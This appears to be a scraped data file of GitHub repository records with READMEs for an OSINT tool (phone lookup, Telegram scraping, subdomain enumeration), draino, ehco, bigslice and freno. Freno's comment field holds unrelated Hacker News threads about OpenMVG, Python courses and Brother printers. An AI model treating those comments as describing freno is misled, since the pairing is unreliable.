shodan.io\n\n\n axfr [] ...\n Subdomain enumeration using crt.sh\n\n --verify Verify URL Status Code\n\n pni ...\n Retrieve info about a give phone number\n\n\n telegram [] \n Telegram public groups and channels scraper\n\n --start=START Start message #\n --end=END End message #\n --grace=15 The number of messages that will be considered deleted before the scraper stops\n --dump Creates and resume messages from dumpfile\n\n rev-whois \n Find domains for name or email address\n\n```\n\n## Configuration file\n\nThe default configuration file is in `$HOME/.config/gosint.toml` for linux environment and `./config/toml` for windows env\n\nYou can place it in different paths, load prioriy is:\n\n- `.`\n- `./config/ or $HOME/.config/`\n- `/etc/gosint/`\n\nIf some API Keys are missing insert it there\n\n## PGP module Demo (**OUTDATED**)\n\n[![asciicast](https://asciinema.org/a/21PCpbgFqyHiTbPINexHKEywj.png)](https://asciinema.org/a/21PCpbgFqyHiTbPINexHKEywj)\n\n## Pwnd module Demo (**OUTDATED**)\n\n[![asciicast](https://asciinema.org/a/x9Ap0IRcNNcLfriVujkNUhFSF.png)](https://asciinema.org/a/x9Ap0IRcNNcLfriVujkNUhFSF)\n\n## Telegram Crawler Demo (**OUTDATED**)\n\n[![asciicast](https://asciinema.org/a/nbRO9FNpjiYXAKeI87xn29j9z.png)](https://asciinema.org/a/nbRO9FNpjiYXAKeI87xn29j9z)\n\n## Shodan module Demo (**OUTDATED**)\n\n[![asciicast](https://asciinema.org/a/9lfzAZ65n9MJCkrUrxoHZQYwP.png)](https://asciinema.org/a/9lfzAZ65n9MJCkrUrxoHZQYwP)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "planetlabs/draino", "link": "https://github.com/planetlabs/draino", "tags": ["kubernetes", "kubernetes-node", "autoremediation", "drain"], "stars": 516, "description": "Automatically cordon and drain Kubernetes nodes based on node conditions", "lang": "Go", "repo_lang": "", "readme": "# draino [![Docker Pulls](https://img.shields.io/docker/pulls/planetlabs/draino.svg)](https://hub.docker.com/r/planetlabs/draino/) [![Godoc](https://img.shields.io/badge/godoc-reference-blue.svg)](https://godoc.org/github.com/planetlabs/draino) [![Travis](https://img.shields.io/travis/com/planetlabs/draino.svg?maxAge=300)](https://travis-ci.com/planetlabs/draino/) [![Codecov](https://img.shields.io/codecov/c/github/planetlabs/draino.svg?maxAge=3600)](https://codecov.io/gh/planetlabs/draino/)\nDraino automatically drains Kubernetes nodes based on labels and node\nconditions. Nodes that match _all_ of the supplied labels and _any_ of the\nsupplied node conditions will be cordoned immediately and drained after a\nconfigurable `drain-buffer` time.\n\nDraino is intended for use alongside the Kubernetes [Node Problem Detector](https://github.com/kubernetes/node-problem-detector)\nand [Cluster Autoscaler](https://github.com/kubernetes/autoscaler/tree/master/cluster-autoscaler).\nThe Node Problem Detector can set a node condition when it detects something\nwrong with a node - for instance by watching node logs or running a script. The\nCluster Autoscaler can be configured to delete nodes that are underutilised.\nAdding Draino to the mix enables autoremediation:\n\n1. The Node Problem Detector detects a permanent node problem and sets the\n corresponding node condition.\n2. Draino notices the node condition. It immediately cordons the node to prevent\n new pods being scheduled there, and schedules a drain of the node.\n3. Once the node has been drained the Cluster Autoscaler will consider it\n underutilised. It will be eligible for scale down (i.e. 
termination) by the\n Autoscaler after a configurable period of time.\n\n## Usage\n```\n$ docker run planetlabs/draino /draino --help\nusage: draino [] ...\n\nAutomatically cordons and drains nodes that match the supplied conditions.\n\nFlags:\n --help Show context-sensitive help (also try --help-long and --help-man).\n -d, --debug Run with debug logging.\n --listen=\":10002\" Address at which to expose /metrics and /healthz.\n --kubeconfig=KUBECONFIG Path to kubeconfig file. Leave unset to use in-cluster config.\n --master=MASTER Address of Kubernetes API server. Leave unset to use in-cluster config.\n --dry-run Emit an event without cordoning or draining matching nodes.\n --max-grace-period=8m0s Maximum time evicted pods will be given to terminate gracefully.\n --eviction-headroom=30s Additional time to wait after a pod's termination grace period for it to have been deleted.\n --drain-buffer=10m0s Minimum time between starting each drain. Nodes are always cordoned immediately.\n --node-label=\"foo=bar\" (DEPRECATED) Only nodes with this label will be eligible for cordoning and draining. May be specified multiple times.\n --node-label-expr=\"metadata.labels.foo == 'bar'\"\n This is an expr string https://github.com/antonmedv/expr that must return true or false. See `nodefilters_test.go` for examples\n --namespace=\"kube-system\" Namespace used to create leader election lock object.\t\n --leader-election-lease-duration=15s\n Lease duration for leader election.\n --leader-election-renew-deadline=10s\n Leader election renew deadline.\n --leader-election-retry-period=2s\n Leader election retry period.\n --skip-drain Whether to skip draining nodes after cordoning.\n --evict-daemonset-pods Evict pods that were created by an extant DaemonSet.\n --evict-emptydir-pods Evict pods with local storage, i.e. with emptyDir volumes.\n --evict-unreplicated-pods Evict pods that were not created by a replication controller.\n --protected-pod-annotation=KEY[=VALUE] ...\n Protect pods with this annotation from eviction. May be specified multiple times.\n\nArgs:\n Nodes for which any of these conditions are true will be cordoned and drained.\n```\n\n### Labels and Label Expressions\n\nDraino allows filtering the elligible set of nodes using `--node-label` and `--node-label-expr`.\nThe original flag `--node-label` is limited to the boolean AND of the specified labels. To express more complex predicates, the new `--node-label-expr`\nflag allows for mixed OR/AND/NOT logic via https://github.com/antonmedv/expr.\n\nAn example of `--node-label-expr`:\n\n```\n(metadata.labels.region == 'us-west-1' && metadata.labels.app == 'nginx') || (metadata.labels.region == 'us-west-2' && metadata.labels.app == 'nginx')\n```\n\n## Considerations\nKeep the following in mind before deploying Draino:\n\n* Always run Draino in `--dry-run` mode first to ensure it would drain the nodes\n you expect it to. In dry run mode Draino will emit logs, metrics, and events\n but will not actually cordon or drain nodes.\n* Draino immediately cordons nodes that match its configured labels and node\n conditions, but will wait a configurable amount of time (10 minutes by default)\n between draining nodes. i.e. If two nodes begin exhibiting a node condition\n simultaneously one node will be drained immediately and the other in 10 minutes.\n* Draino considers a drain to have failed if at least one pod eviction triggered\n by that drain fails. 
If Draino fails to evict two of five pods it will consider\n the Drain to have failed, but the remaining three pods will always be evicted.\n* Pods that can't be evicted by the cluster-autoscaler won't be evicted by draino.\n See annotation `\"cluster-autoscaler.kubernetes.io/safe-to-evict\": \"false\"` in\n [cluster-autoscaler documentation](https://github.com/kubernetes/autoscaler/blob/master/cluster-autoscaler/FAQ.md#what-types-of-pods-can-prevent-ca-from-removing-a-node)\n\n## Deployment\n\nDraino is automatically built from master and pushed to the [Docker Hub](https://hub.docker.com/r/planetlabs/draino/).\nBuilds are tagged `planetlabs/draino:$(git rev-parse --short HEAD)`.\n\n**Note:** As of September, 2020 we no longer publish `planetlabs/draino:latest`\nin order to encourage explicit and pinned releases.\n\nAn [example Kubernetes deployment manifest](manifest.yml) is provided.\n\n## Monitoring\n\n### Metrics\nDraino provides a simple healthcheck endpoint at `/healthz` and Prometheus\nmetrics at `/metrics`. The following metrics exist:\n\n```bash\n$ kubectl -n kube-system exec -it ${DRAINO_POD} -- apk add curl\n$ kubectl -n kube-system exec -it ${DRAINO_POD} -- curl http://localhost:10002/metrics\n# HELP draino_cordoned_nodes_total Number of nodes cordoned.\n# TYPE draino_cordoned_nodes_total counter\ndraino_cordoned_nodes_total{result=\"succeeded\"} 2\ndraino_cordoned_nodes_total{result=\"failed\"} 1\n# HELP draino_drained_nodes_total Number of nodes drained.\n# TYPE draino_drained_nodes_total counter\ndraino_drained_nodes_total{result=\"succeeded\"} 1\ndraino_drained_nodes_total{result=\"failed\"} 1\n```\n\n### Events\nDraino is generating event for every relevant step of the eviction process. Here is an example that ends with a reason `DrainFailed`. When everything is fine the last event for a given node will have a reason `DrainSucceeded`.\n```\n> kubectl get events -n default | grep -E '(^LAST|draino)'\n\nLAST SEEN FIRST SEEN COUNT NAME KIND TYPE REASON SOURCE MESSAGE\n5m 5m 1 node-demo.15fe0c35f0b4bd10 Node Warning CordonStarting draino Cordoning node\n5m 5m 1 node-demo.15fe0c35fe3386d8 Node Warning CordonSucceeded draino Cordoned node\n5m 5m 1 node-demo.15fe0c360bd516f8 Node Warning DrainScheduled draino Will drain node after 2020-03-20T16:19:14.91905+01:00\n5m 5m 1 node-demo.15fe0c3852986fe8 Node Warning DrainStarting draino Draining node\n4m 4m 1 node-demo.15fe0c48d010ecb0 Node Warning DrainFailed draino Draining failed: timed out waiting for evictions to complete: timed out\n```\n\n### Conditions\nWhen a drain is scheduled, on top of the event, a condition is added to the status of the node. This condition will hold information about the beginning and the end of the drain procedure. 
This is something that you can see by describing the node resource:\n\n```\n> kubectl describe node {node-name}\n......\nUnschedulable: true\nConditions:\n Type Status LastHeartbeatTime LastTransitionTime Reason Message\n ---- ------ ----------------- ------------------ ------ -------\n OutOfDisk False Fri, 20 Mar 2020 15:52:41 +0100 Fri, 20 Mar 2020 14:01:59 +0100 KubeletHasSufficientDisk kubelet has sufficient disk space available\n MemoryPressure False Fri, 20 Mar 2020 15:52:41 +0100 Fri, 20 Mar 2020 14:01:59 +0100 KubeletHasSufficientMemory kubelet has sufficient memory available\n DiskPressure False Fri, 20 Mar 2020 15:52:41 +0100 Fri, 20 Mar 2020 14:01:59 +0100 KubeletHasNoDiskPressure kubelet has no disk pressure\n PIDPressure False Fri, 20 Mar 2020 15:52:41 +0100 Fri, 20 Mar 2020 14:01:59 +0100 KubeletHasSufficientPID kubelet has sufficient PID available\n Ready True Fri, 20 Mar 2020 15:52:41 +0100 Fri, 20 Mar 2020 14:02:09 +0100 KubeletReady kubelet is posting ready status. AppArmor enabled\n ec2-host-retirement True Fri, 20 Mar 2020 15:23:26 +0100 Fri, 20 Mar 2020 15:23:26 +0100 NodeProblemDetector Condition added with tooling\n DrainScheduled True Fri, 20 Mar 2020 15:50:50 +0100 Fri, 20 Mar 2020 15:23:26 +0100 Draino Drain activity scheduled 2020-03-20T15:50:34+01:00\n```\n\n Later when the drain activity will be completed the condition will be amended letting you know if it succeeded of failed:\n\n```\n> kubectl describe node {node-name}\n......\nUnschedulable: true\nConditions:\n Type Status LastHeartbeatTime LastTransitionTime Reason Message\n ---- ------ ----------------- ------------------ ------ -------\n OutOfDisk False Fri, 20 Mar 2020 15:52:41 +0100 Fri, 20 Mar 2020 14:01:59 +0100 KubeletHasSufficientDisk kubelet has sufficient disk space available\n MemoryPressure False Fri, 20 Mar 2020 15:52:41 +0100 Fri, 20 Mar 2020 14:01:59 +0100 KubeletHasSufficientMemory kubelet has sufficient memory available\n DiskPressure False Fri, 20 Mar 2020 15:52:41 +0100 Fri, 20 Mar 2020 14:01:59 +0100 KubeletHasNoDiskPressure kubelet has no disk pressure\n PIDPressure False Fri, 20 Mar 2020 15:52:41 +0100 Fri, 20 Mar 2020 14:01:59 +0100 KubeletHasSufficientPID kubelet has sufficient PID available\n Ready True Fri, 20 Mar 2020 15:52:41 +0100 Fri, 20 Mar 2020 14:02:09 +0100 KubeletReady kubelet is posting ready status. AppArmor enabled\n ec2-host-retirement True Fri, 20 Mar 2020 15:23:26 +0100 Fri, 20 Mar 2020 15:23:26 +0100 NodeProblemDetector Condition added with tooling\n DrainScheduled True Fri, 20 Mar 2020 15:50:50 +0100 Fri, 20 Mar 2020 15:23:26 +0100 Draino Drain activity scheduled 2020-03-20T15:50:34+01:00 | Completed: 2020-03-20T15:50:50+01:00\n ```\n\nIf the drain had failed the condition line would look like:\n```\n DrainScheduled True Fri, 20 Mar 2020 15:50:50 +0100 Fri, 20 Mar 2020 15:23:26 +0100 Draino Drain activity scheduled 2020-03-20T15:50:34+01:00| Failed:2020-03-20T15:55:50+01:00\n```\n\n## Retrying drain\n\nIn some cases the drain activity may failed because of restrictive Pod Disruption Budget or any other reason external to Draino. The node remains `cordon` and the drain condition \nis marked as `Failed`. If you want to reschedule a drain tentative on that node, add the annotation: `draino/drain-retry: true`. A new drain schedule will be created. 
Note that the annotation is not modified and will trigger retries in loop in case the drain fails again.\n\n```\nkubectl annotate node {node-name} draino/drain-retry=true\n```\n## Modes\n\n### Dry Run\nDraino can be run in dry run mode using the `--dry-run` flag.\n\n### Cordon Only\nDraino can also optionally be run in a mode where the nodes are only cordoned, and not drained. This can be achieved by using the `--skip-drain` flag.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Ehco1996/ehco", "link": "https://github.com/Ehco1996/ehco", "tags": ["relay", "echo"], "stars": 516, "description": "ehco is a network \u029arelay\u025e tool and a typo :)", "lang": "Go", "repo_lang": "", "readme": "# Ehco\n\nehco is a network relay tool and a typo :)\n\n[![Go Report Card](https://goreportcard.com/badge/github.com/Ehco1996/ehco)](https://goreportcard.com/report/github.com/Ehco1996/ehco)\n[![go.dev reference](https://img.shields.io/badge/go.dev-reference-007d9c?logo=go&logoColor=white&style=flat-square)](https://pkg.go.dev/github.com/Ehco1996/ehco)\n[![Docker Pulls](https://img.shields.io/docker/pulls/ehco1996/ehco)](https://hub.docker.com/r/ehco1996/ehco)\n\n## Quick Start\n\nlet's see some examples\n\n> relay all tcp traffic from `0.0.0.0:1234` to `0.0.0.0:5201`\n\n`ehco -l 0.0.0.0:1234 -r 0.0.0.0:5201`\n\n> also relay udp traffic to `0.0.0.0:5201`\n\n`ehco -l 0.0.0.0:1234 -r 0.0.0.0:5201 -ur 0.0.0.0:5201`\n\n## Advanced Usage\n\nTBD, for now, you can see more examples in [ReadmeCN](README.md)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "grailbio/bigslice", "link": "https://github.com/grailbio/bigslice", "tags": ["cluster", "computing", "go", "golang", "mapreduce", "bigdata", "machinelearning", "etl"], "stars": 516, "description": "A serverless cluster computing system for the Go programming language", "lang": "Go", "repo_lang": "", "readme": "# Bigslice\n\nBigslice is a serverless cluster data processing system for [Go](https://golang.org).\nBigslice exposes composable API\nthat lets the user express\ndata processing tasks in terms of a series of\ndata transformations that invoke user code.\nThe Bigslice runtime then\ntransparently parallelizes and distributes the work,\nusing the [Bigmachine](https://github.com/grailbio/bigmachine)\nlibrary to create an ad hoc cluster on a cloud provider.\n\n- website: [bigslice.io](https://bigslice.io/)\n- API documentation: [godoc.org/github.com/grailbio/bigslice](https://godoc.org/github.com/grailbio/bigslice)\n- issue tracker: [github.com/grailbio/bigslice/issues](https://github.com/grailbio/bigslice/issues)\n- [![CI](https://github.com/grailbio/bigslice/workflows/CI/badge.svg)](https://github.com/grailbio/bigslice/actions?query=workflow%3ACI) [![Full Test](https://github.com/grailbio/bigslice/workflows/Full%20Test/badge.svg)](https://github.com/grailbio/bigslice/actions?query=workflow%3A%22Full+Test%22)\n\n# Developing Bigslice\n\nBigslice uses Go modules to capture its dependencies;\nno tooling other than the base Go install is required.\n```\n$ git clone https://github.com/grailbio/bigslice\n$ cd bigslice\n$ GO111MODULE=on go test\n```\n\nIf tests fail with `socket: too many open files` errors, try increasing the maximum number of open files.\n```\n$ ulimit -n 2000\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": 
""}, {"name": "github/freno", "link": "https://github.com/github/freno", "tags": ["mysql", "replication", "high-availability", "throttle", "vitess", "proxysql"], "stars": 516, "description": "freno: cooperative, highly available throttler service", "lang": "Go", "repo_lang": "", "readme": "# freno\n\n[![build status](https://github.com/github/freno/actions/workflows/main.yml/badge.svg)](https://github.com/github/freno/actions/workflows/main.yml) [![downloads](https://img.shields.io/github/downloads/github/freno/total.svg)](https://github.com/github/freno/releases) [![release](https://img.shields.io/github/release/github/freno.svg)](https://github.com/github/freno/releases)\n\nCooperative, highly available throttler service: clients use `freno` to throttle writes to a resource.\n\nCurrent implementation can throttle writes to (multiple) MySQL clusters, based on replication status for those clusters. `freno` will throttle cooperative clients when replication lag exceeds a pre-defined threshold.\n\n`freno` dynamically adapts to changes in server inventory; it can further be controlled by the user to force throttling of certain apps.\n\n`freno` is highly available and uses `raft` consensus protocol to decide leadership and to pass user events between member nodes.\n\n\n### Cooperative\n\n`freno` collects data from backend stores (at this time MySQL only) and has the logic to answer the question \"may I write to the backend store?\"\n\nClients (application, scripts, jobs) are expected to consult with `freno`. `freno` is not a proxy between the client and the backend store. It merely observes the store and states \"you're good to write\" or \"you should stop writing\". Clients are expected to consult with `freno` and respect its recommendation.\n\n### Stores and apps\n\n`freno` collects data per data store. E.g. when probing MySQL clusters it will collect replication lag per cluster, independently. Backend store metrics are collected automatically and represent absolute truths.\n\n`freno` serves clients, identified as _apps_. Since `freno` is cooperative, it trusts apps to identify themselves. Apps can be managed: `freno` can be instructed to forcibly throttle a certain app. This is so as to enable other, high priority apps to run to completion. `freno` merely accepts instructions on who to throttle, and does not have scheduling/prioritization logic of its own.\n\n### MySQL\n\n`freno` is originally designed to provide a unified, self adapting solution to MySQL throttling: controlling writes while maintaining low replication lag.\n\n`freno` is configured with a pre-defined list of MySQL clusters. This may includes credentials, lag (or other) inspection query, and expected thresholds. For each cluster, `freno` needs to know what servers to probe and collect data from. For each cluster, you may provide this list:\n\n- static, hard coded list of `hostname[:port]`\n- dynamic. Hosts may come and go, and throttling may adapt to these changes. Supported dynamic options:\n - via `haproxy`: provide `freno` with a `haproxy` URL and backend/pool name, and `freno` will periodically parse the list of enabled servers in that pool and dynamically adapt to probe it.\n\nRead more about [freno and MySQL throttling](doc/mysql.md)\n\n### Use cases\n\n`freno` is useful for bulk operations: massive loading/archiving tasks, schema migrations, mass updates. Such operations typically walk through thousands to millions of rows and may cause undesired effects such as MySQL replication lags. 
By breaking these tasks to small subtasks (e.g. `100` rows at a time), and by consulting `freno` before applying each such subtask, we are able to achieve the same result without ill effect to the database and to the application that uses it.\n\n`freno` can also be used to determine actual lag to infer validity of replicas. This can assist in mitigating write-then-read pains of master reads. See [here](doc/http.md#specialized-requests).\n\n### HTTP\n\n`freno` serves requests via `HTTP`. The most important request is the `check` request: \"May this app write to this store?\". `freno` appreciates `HEAD` requests (`GET` are also accepted, with more overhead) and responds with status codes:\n\n- `200` (OK): Application may write to data store\n- `404` (Not Found): Unknown metric name.\n- `417` (Expectation Failed): Requesting application is explicitly forbidden to write.\n- `429` (Too Many Requests): Do not write. A normal state indicating the store's state does not meet expected threshold.\n- `500` (Internal Server Error): Internal error. Do not write.\n\nRead more on [HTTP requests & responses](doc/http.md)\n\n### Clients\n\nClients will commonly issue `/check/...` requests via `HEAD`.\n\nClients can be expected to issue many requests per second. `freno` is lightweight in resources. It should be just fine to hit `freno` hundreds of times per second. It depends on your hardware and resources, of course.\n\nIt makes sense to hit `freno` in the whereabouts of the granularity one is looking at. If your client is to throttle on a `1000ms` replication lag, checking `freno` `200` times per sec may be overdoing it. However if you wish to keep your clients naive and without caching this should be fine.\n\nRead more on [clients](doc/clients.md)\n\n### Raft\n\n`freno` uses `raft` to provide high availability. `freno` nodes will compete for _leadership_ and only the leader will collect metrics and should serve clients.\n\nRead more on `raft` and [High Availability](doc/high-availability.md)\n\n### Configuration\n\nSee [sample config file](resources/freno.conf.sample.json). Also find:\n\n- [General/raft configuration](doc/high-availability.md#configuration) dissection\n- [MySQL-specific configuration](doc/mysql.md#configuration) dissection\n\n### Deployment\n\nSee [deployment docs](doc/deploy.md) for suggestions on a recommended `freno` deployment setup.\n\n### Resources\n\nYou may find various [resources](resources/) for setting up `freno` in your environment.\n\n[freno-client](https://github.com/github/freno-client) is our Ruby client for `freno`, open sourced and available as a Ruby Gem.\n\n### What's in a name?\n\n\"Freno\" is Spanish for \"brake\", as in _car brake_. Basically we just wanted to call it \"throttler\" or \"throttled\" but both these names are in use by multiple other repositories and we went looking for something else. When we looked up the word \"freno\" in a dictionary, we found the following sentence:\n\n> Echa el freno, magdaleno!\n\nThis reminded us of the 80's and that was it.\n\n### Project status\n\nThis project is under active development.\n\n### Contributing\n\nThis repository is [open to contributions](.github/CONTRIBUTING.md). Please also see [code of conduct](.github/CODE_OF_CONDUCT.md)\n\n### License\n\nThis project is released under the [MIT LICENSE](LICENSE). 
Please note it includes 3rd party dependencies release under their own licenses; these are found under [vendor](https://github.com/github/freno/tree/master/vendor).\n\n### Authors\n\nAuthored by GitHub Engineering\n", "readme_type": "markdown", "hn_comments": "10 years ago I released the first version of OpenMVG Feb 8, 2013 and I thought it would be nice to summarize my learning on 10 years of OpenMVG to celebrate these milestones.\ud835\udc47\ud835\udc3f;\ud835\udc37\ud835\udc45\nOpenMVG is my attempt to create a project that allows individuals to learn 3D reconstruction from images. Through working on the project, I have gained valuable knowledge on various fronts and have greatly enjoyed the experience. Sharing this journey with others, discussing and collaborating has been extremely rewarding and helped me being a better developer, scientist and better person.In this note I reflect on 4 points that matters when creating an open source project and share a take home message for each :\n- Build the necessary code and start from scratch\n- Make the entire toolchain open and usable freely\n- Maintain and contribute to the project in a long term manner\n- Getting contributionsFrom a Reddit post[1] by one of the coders involved in the effort. Post contains a video summary.Interesting React wrapper for existing pure JS/CSS framework developed by the French Government. All Open Source and maintained.Also interesting is the https://code.gouv.fr/ where one can find repos of tools and sites across many state organisations.[1]: https://www.reddit.com/r/reactjs/comments/10gwean/the_french...Maybe giving them a git GUI rather than commands to run would be better. You have to merge their work somehow. Limiting the commands they can use would be helpful. You might consider using Bitbucket, which has much better branch & operation permission capabilities, like being able to block force pushes based on branch naming patternstl;Dr this sounds like a people / process issue more than a tooling issue. Try to understand why they feel so rushed that they don't slow down to do it the right way. I suspect certain (anecdotal) cultural traits endemic in hardware companies.> my team is generally unfamiliar with coding, and if they are, aren\u2019t up to date on best practices, as it is not their primary job.Slightly off topic but this such a problem nowadays. Coding is everywhere now but it's treated like \"it's only software\", especially from people who are in more traditional engineering disciplines.This is partly a cultural issue but it's also technical. Software engineering / coding workflows are expected to be roughly the same whenever there is coding involved. In classical engineering the processes and the mental models of how to develop a product are completely different to modern software engineering which creates the tooling vacuum that you describe.Have you tried GitHub Desktop? https://desktop.github.com/It looks cool. You'll forgive me for not trying every example. However,1. It doesn't seem to work in Microsoft Edge when the default Enhanced Security is turned on. You might need to ask people to turn that off. I'm not sure about a workaround. It panics with insufficient stack space.2. How does it pay its own bills? If you get bored with it, what will happen to it? I'm sure Codecademy has a revenue strategy.Just curious!I clicked \"just code\" on the landing page and it took me to a page where the left pane showed an empty (black) terminal and the right one a python shell. 
Looking at the developer tools I saw a message in reponse to my hello world input saying that I should type 1+2. But it was never displayed.Then based on this hint, clicking around I managed to reveal the tutorial (showing up on the right). So it seems that there is a bug in the navigation or maybe the \"just code\" link on the landing points to the wrong place.Awesome! will try this out with my 10 year old and 6 year old who I want to get started with coding, as I'm not so keen on kid-focused options which abstract the actual coding away with \"cute\" visual representations (conditionals, loops, variables are not difficult concepts to grasp). IMO Ruby is the best language for teaching coding to kids (I taught it to my daughter when she was 10, years ago, she's now a SWE with a ChemEng degree) but there are more tools for Python these days, so perhaps a better choice for my younger ones. \nThanks for making open source!Does anyone know a good resource for someone who was very familiar with older Python (early 2.x) and would like to get up to speed on the latest Python along with current/best practices?Related:Show HN: Futurecoder \u2013 A free online interactive Python course - https://news.ycombinator.com/item?id=28737779 - Oct 2021 (24 comments)looks cooltried the code playground, but seems there is no intellisense?i think that would be very useful to learningLooks great, and I love that it requires no account - you can jump right in!One minor annoyance for me was that the animation for a correct answer - the exploding confetti - was a bit over the top. Like \"OK, yeah, chill out, all I did was get the answer right to an easy question\". I just find it too much to see that every time, but maybe that's just me.This is awesome, would love to see this for other languages as well. As for Python, can you add some walkthroughs for leetcode style questions. It'll help tons of us!This is great! Thanks for making it free and open source. \nIs there anything similar for TypeScript or JavaScript?This looks really good, going through the first couple of tasks it seems well considered.I'm introducing my 8yo daughter to programming at the moment, she is beginning to play around with Scratch. I'm keeping my eye out some something closer to proper coding though. I think this may be a little too far at the moment, but I may try her out on it with me sitting next to her and see how she gets on!Is there any way for users to construct their own multiple stage tutorials? (It looks like we can do single questions)Currently you have the console output, have you considered having a canvas/bitmap output that could be targeted with the various Python drawing and image manipulation apis?Incredibly generous of you to make it open source!The only downside is theres multiple ways to reach the same outcome, and unless you program it exactly what you're looking for it gives a false negative that the solution isn't correctThis is great. Would love to see this in Spanish. I\u2019m a fluent speaker but have never talked about code in Spanish, however I\u2019d be up to the challenge of helping translateThis, and other recommendations in this thread, are marvelous. I'm hopefully going to start volunteering at my kids' school teaching coding to ~10-12 year olds, and this will be a great tool for anyone who needs something more challenging.I would love to see something like this but for c++. 
I'm going to teach my kids programming but I want to go in this order c++ -> java, javascript/typescript, python -> rust, go -> perl, bashI\u2019ve just gotten started with Python, so this is perfect timing. Thank you!Thanks for sharing! This is really cool. I maintain my own learn-to-program site, so I have a sense of how much work this is.One interactive component that we use heavily that might interest you for futurecoder is what we call an interactive walkthrough: https://www.learncs.online/best#interactive-walkthroughs. It's like a video but preserving the interactive nature of a playground. Students really like them, and enjoy the opportunity to hear multiple explanations for the same concept when they're stuck. (We're working on popping this out for external use, and have a library in the works that you may be able to integrate with a bit of work.)I have no idea what your educational background is, but if you ever want a stable position that supports your educational innovation, consider applying for a teaching faculty job: https://go.cs.illinois.edu/teaching-faculty-hiring. (Currently our openings require a Masters degree.) We need more creators in computer science education.This is great! I am about to start datacamp, but I will also play with this one too.[flagged]i've tried few python learning apps half an year a go an oh boy... this one is 100x better and free?!?! \nniceThis looks great. I like how it's designed for self-paced instruction rather than classroom instruction. I noticed it doesn't appear to support multi-line input. Is that planned?BTW, to monetize this, you might create module-specific tutorials (like Pandas, Pygame, etc.) and implement a \"pay what you want\" system where $10 or more buys 5 modules.Looks great, will be recommending this in the futuse!I'll have to take a look. I really like exercism.org but I'm always looking for new ways to learn.I've got a Brother laser printer that's probably old enough to vote now. It's impressive that it's lasted this long, but the whole business model of printing is so rotten I still wonder how much I want it around when the toners have run completely dry. On top of the installation being a mess.I've seen that companies like Brother make dedicated shipping label printers, and I guess that's what I realistically would use my printer for the most.Brother's clearly doing horrible stuff, but printers also seem like a terrible business model when you ship products that live forever without maintenance beyond refilling the paper tray and toner.If only the e-ink display technology weren't encumbered by so many patents, maybe that's what we'd be reading most things on now instead.Yes, we all rage about this. K-cups, razors. Wait for the next decade: e-vehicle chargers, rocket booster packs (must be approved mixtures!). It never ends, not for this generation, or the next.So, just picking an open publishing article:Playing Super Mario 64 increases hippocampal grey matter in older adultshttps://journals.plos.org/plosone/article?id=10.1371/journal...Unfortunately, I don't have the strength, and I just want a different way.Aw and I thought brother was one of the good ones.The FTC seems to have got off their ass recently, so maybe it'd be worth it to file consumer protection complaints about shitty printer company behavior. I'm sure HN alone could fill their mailbox to bursting.Oh, this is bad. 
Brother has always, like for DECADES, been the non-shitty option.Had ipv6 before anyone else.Good Linux support, even for the scanners on their MFCs.Agnostic about third-party toner.This new firmware demolishes twenty years of goodwill.I was just looking at a new printer, and likely to replace my old Brother B&W MFC and Samsung color laser, with a new Brother color laser MFC, but it looks like I'll see how long I can string the old ones along.Gods I hope this is just a fluke but reading OP and some comments it seems that it is not. :(In any case, first thing I always do when I install a printer is to give it one exact static local IP because I made a firewall rule that blocks all outgoing WAN traffic from that IP. I lost faith in all my periphery to not sing behind my back and took things in my own hands.My Brother MFC works amazingly well and I will not think as a programmer in this case; I'll be a normal human who says \"no need to update it if it works\" and leave it at that.So far zero complains and I am happy with my device. And with these news I am even happier that I am paranoid and make sure my device doesn't get a firmware update.This is disappointing.I had been recommending Brother printers exactly because they did not pull shenanigans like this, their windows drivers were pretty light weight, and their Linux support is very good.Is anyone working on a OSS printer, like 3D printers? Buy an existing printer and then rip out + re-wire it's controller?Wanting to update the firmwareIf you weren't ever wary of updates, this should be a strong lesson. The updates are not for your benefit anymore; the companies just want to have you on a leash where they hold the other end.\"Don't fix it if it ain't broke.\"and then just purposefully print like garbageIn other words, they're maliciously spreading FUD that 3rd-party consumables will result in lower print quality, and then making that a self-fulfilling prophecy. That should be illegal if it isn't already.This is why I've never voluntarily owned a printer. Well, never actually owned one at all. My father got a bit frustrated that I didn't have a home printer and gifted one to my wife. It was used a couple of times.If I have something I need to print, I print it at work or at the library. Happens less than once a year. I don't need my own printer.Last time I had to print something it was so I could turn it in as an attachment to an application with a government agency. I flatly refuse to work with dead trees wherever possible.I have nothing but bad things to say about Brother. I will never buy another one.Last purchase was a $350 multifunction color laser printer that stopped turning on. I was just over the one year warranty and no support from Brother and their authorized service centers want to put me on a commercial support plan. I bought it for my wife, a teacher, because the school copiers were always broken or unavailable.HP makes shitty printers but they will actually help you get something replaced in my experience.I've been fighting brother printers for decades at this point. From taping over the clear hole plug to rewinding the spring cog. I feel like the only thing they can defeat me is probably NFC but I'm not sure if that would be worth it cost wise for them.I thought that was well known. In EU printers cannot be sold \"inked locked\". They do lock themselves as soon as they have an opportunity to update their firmware. My Brother never had Internet access. 
I configured it with the Internet gateway unplugged and assigned it a static address to which I forbid Internet access. It is now running on compatible color cartridges. For black I stay on OEM ink.It is funny that my venerable HP I had previously stopped working soon after I started using compatible ink. Since it was several years old, I was wanted to spare on ink. A gear broke soon after. Repaired the gear and something else broke. I did not do the second repair. Of course that could be a simple co\u00efncidence, I'll never know.BTW I would not recommend Brother either. It is very picky about paper. Have to use good quality 90g or more exclusively.I have an epson eco-tank printer. I buy 3rd party bottles of ink once every 2-3 years. The upfront cost of the printer (multifunction model ET-4550) was high in 2015 ($500) but I've spent maybe $60-70 in ink to print (as of this morning) 19,536 pages (13,954 in color, 5,582 in B/W).I can't see a good reason to keep buying printers that are locked into proprietary cartridges or toners.Aw man, my trustworthy Brothers HL-5470DW Brothers laser jet is taking a licking and still printing after 10 years.Here is to another 10 years \u2026 before I buy another used laser jet that hasn\u2019t been stupidly John Deere\u2019d.Remember that for some printers there are two parts, you need to change the ink and after some changes also the \"cylinder\". In any case I had seen a similar poor quality results in the brand. Can't recommend it.Ok... so if I need a printer, that won't fuck me with stuff like this, what should I buy now? Except HP of course, and now BrotherYeah I'm struggling. Last 15 years I bought 